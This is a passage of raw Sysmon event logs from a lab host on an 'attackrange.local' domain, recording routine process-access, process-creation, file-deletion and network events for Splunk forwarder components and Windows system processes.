Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CF7-613A-1390-03000000C801}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4CF7-613A-1390-03000000C801}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CF7-613A-1390-03000000C801}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.740{B81B27B7-4CF7-613A-1390-03000000C801}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1798FB86ED079FB413D9158D6CCA5A4C,SHA256=0B02AD50B878C62EAEA05F68C0437A4A1901FE84636630B3E672139D856D9A6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1B2E779410CBD0DD3279AD25C1EF99F,SHA256=A5BF7FE3D9605FFA3D47C1E63EBFC0317882171CEBAD6D377549E6FDAD5A4EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=722483DAE679821153B01521A92BF74D,SHA256=85C51C94CC31E35085940EF87CE2C5EDD5909AC957E661C56B38EE849B8917B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.575{B81B27B7-4CF8-613A-1490-03000000C801}54366156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CF8-613A-1490-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4CF8-613A-1490-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.422{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CF8-613A-1490-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.408{B81B27B7-4CF8-613A-1490-03000000C801}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:44.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89C4B714A54DE993456C15AB381A0376,SHA256=A8A74613F9CCC289EC879EE9C9E456C223723052C28B36F014E9B87980DE65DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFBDD2522B058E9262C128AD668BF9D,SHA256=E66553D7975EA0ACA8158931BFBA3AE258D348B579D429E8E00056419E26BB60,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F81848B49CC770596CF06637EE40BE9E,SHA256=69944A4EEAB35A51E06988B951941CE9B14A7D112C9A354386AD6DBEFD30F087,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:09.150{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56486-false10.0.1.12-8000- 10341000x800000000000000035083517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CF9-613A-1590-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CF9-613A-1590-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.038{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CF9-613A-1590-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.023{B81B27B7-4CF9-613A-1590-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 